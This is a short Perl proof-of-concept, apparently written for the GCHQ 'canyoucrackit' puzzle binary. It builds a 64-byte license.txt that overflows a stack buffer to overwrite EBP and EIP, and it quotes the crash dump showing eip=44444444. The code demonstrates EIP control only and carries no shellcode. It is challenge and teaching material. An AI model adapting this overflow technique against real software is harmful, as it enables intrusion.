###
# GCHQ canyoucrackit challenge and vulnerable binary for the win!
# Save this as poc.pl and run `perl poc.pl` in the same directory as the GCHQ
# canyoucrackit executable, which can be downloaded from the (not so) secret
# URL below. That executable is an untrusted third-party binary pulled off
# the internet: run it only inside an isolated VM or sandbox, never on a
# machine you care about.
# 
# URL: http://canyoucrackit.co.uk/da75370fe15c4148bd4ceec861fbdaa5.exe
# The binary writes a stackdump file when it crashes; the register values
# excerpted below come from such a dump and are what confirm the EBP/EIP
# offsets used by this script. You will need cygwin1.dll and cygcrypt-0.dll
# available to run the binary.
#
# Anyone else catch this? :)))
# 
# PoC just for fun 
# Dillon Beresford
# twitter.com/D1N
###

###
# Exception: STATUS_ACCESS_VIOLATION at eip=44444444
# eax=FFFFFFFF ebx=0022CD50 ecx=611663A0 edx=00000000 esi=0022CD75 edi=00000000
# ebp=42424242 esp=0022CD30 program=C:\Documents and Settings\tester\Desktop\gchq_owned_eip_42424242\da75370fe15c4148bd4ceec861fbdaa5.exe, pid 3364, thread main
# cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
###

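# Crash reproducer: write a 64-byte license.txt that overflows the fixed-size
# stack buffer the canyoucrackit binary reads it into. The layout (56 bytes of
# filler, 4 bytes into the saved frame pointer, 4 bytes into the saved return
# address) was taken from the stackdump recorded in the header above, where
# ebp=42424242 and eip=44444444; it is not derived at runtime.
use strict;
use warnings;

my $exploit = "license.txt";

# Filler up to the saved EBP, then the value that lands in EBP, then the value
# that lands in EIP. 0x44444444 is a deliberately unmapped address so the
# STATUS_ACCESS_VIOLATION is unambiguous; this PoC only demonstrates control
# of EIP and carries no shellcode or return address.
my $junk = "\x41" x 56;
my $ebp  = "\x42" x 4;
my $eip  = "\x44\x44\x44\x44";

my $payload = $junk . $ebp . $eip;

# Three-arg open with a lexical handle: the two-arg form lets a filename that
# starts with '>' or '|' change the open mode. Every I/O step is checked so a
# read-only directory or full disk is reported instead of silently producing
# no file. binmode keeps the raw bytes intact on Windows/Cygwin text-mode
# handles.
open my $fh, '>', $exploit or die "open $exploit: $!";
binmode $fh;
print {$fh} $payload or die "write $exploit: $!";
close $fh or die "close $exploit: $!";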